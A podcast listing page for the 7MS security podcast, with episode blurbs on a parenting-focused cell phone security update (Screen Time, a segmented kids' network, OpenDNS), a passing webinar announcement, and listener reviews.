The test costs + exam for a non-participating organization (like 7MS) is $2,500. You also have to re-up every 3 years for $260 (yay, another thing to have to pay for regularly).

In the miscellany department:

  • Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness.

  • A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here!

Apr 09 2020

40mins

Play

7MS #408: Cell Phone Security for Tweenagers - Part 2

Podcast cover
Read more

This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS

"I think of what the world could be If it did not have COVID-19 A million dreams is all it's gonna taaaaaaaaaaaaaaaake!"

Today's episode is a continuation and update on the cell phone security for tweenagers episode from about a year ago. Specifically, I talk about:

  • How the cell phone contract I put together for my tweenager kind of blew up in my face
  • I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely.
  • Apple Screen Time is your friend, and helps put some limits on iDevice use
  • The Dream Machine makes it easy to setup a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day
  • You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks
  • If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors.

More info at 7ms.us!

Apr 03 2020

32mins

Play

iTunes Ratings

54 Ratings
Average Ratings
50
2
2
0
0

Great small bits of security

By Infinity dreamer 90 - Feb 20 2019
Read more
Thanks for sharing your security secrets!

Brian Johnson

By Caneron Johnson - May 06 2018
Read more
Hey this is Cameron Luis Fronodo Johnson and I‚Äôm your son bye Dad love you!! ūüĎč